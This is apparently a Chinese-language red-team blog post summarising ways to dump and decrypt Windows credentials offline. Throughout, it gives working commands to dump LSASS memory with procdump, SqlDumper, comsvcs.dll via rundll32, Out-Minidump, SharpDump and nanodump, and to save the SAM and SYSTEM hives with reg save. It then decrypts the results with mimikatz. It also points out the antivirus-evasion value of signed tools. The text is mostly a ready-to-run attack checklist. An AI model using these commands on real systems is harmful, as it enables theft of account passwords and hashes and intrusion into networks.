离线解密windows凭证的常见方式总结

前言

本文总结常见的离线解密hash的方式，如有不对之处，还请各位师傅斧正。

任务管理器

以管理员身份打开任务管理器,选中lsass进程，创建转储文件

之后会显示转储文件保存的位置

之后运行mimikatz本地解密

sekurlsa::minidump C:\Users\root\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

Procdump

使用Procdump(管理员权限)进行进程转储，可以下载具有微软签名的procdump，具备一定的免杀能力
https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

procdump.exe -accepteula -ma lsass.exe lsass.dmp

之后对导出的凭据进行解密

sqldumper

SQLDumper.exe包含在Microsoft SQL和Office中，可生成完整转储文件
sqldumper的常见路径如下

C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe

C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\SQLDumper.exe

C:\Program Files (x86)\Microsoft SQL Server\100\Shared\SqlDumper.exe

之后运行

SqlDumper.exe <lsass pid> 0 0x01100

再本地解密即可

comsvcs.dll

使用 rundll32找到机器的comsvcs.dll,之后以powershell(管理员)运行以下命令

Get-Process lsass

rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <pid> C:\lsass.dmp full

之后本地解密

这里测试cmd不能导出文件，后来通过搜索发现在dump指定进程内存文件时，需要开启SeDebugPrivilege权限。而在cmd中此权限是默认禁用的，powershell是默认启用的。

简单解决办法：我们可以在cmd中开启此权限
使用工具https://github.com/daem0nc0re/PrivFu/tree/main/SwitchPriv 来切换权限

注册表导出sam文件

system文件位置:C:\Windows\System32\config\SYSTEM
SAM文件位置:C:\Windows\System32\config\SAM

reg save HKLM\SYSTEM C:\system.hiv 

reg save HKLM\sam C:\sam.hiv

之后对导出的sam文件进行解密

lsadump::sam /sam:C:\sam.hiv /system:C:\system.hiv

这里也可以导出HKLM\security，然后mimikatz离线解密

Out-Minidump

使用powershell脚本：https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
运行

Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump

之后解密

SharpDump

项目地址：https://github.com/GhostPack/SharpDump
编译好直接运行(管理员权限)，然后解密即可

hashdump

项目地址：https://github.com/lengjibo/RedTeamTools/tree/master/windows/hashdump
测试使用new_mimidump成功，须管理员权限

解密

nanodump

项目地址：https://github.com/helpsystems/nanodump
笔者这里是用的老版插件，加载插件后运行nanodump离线dumphash，这里需要管理员权限

在CS中下载

使用shell脚本进行还原

bash restore_signature.sh <dumpfile>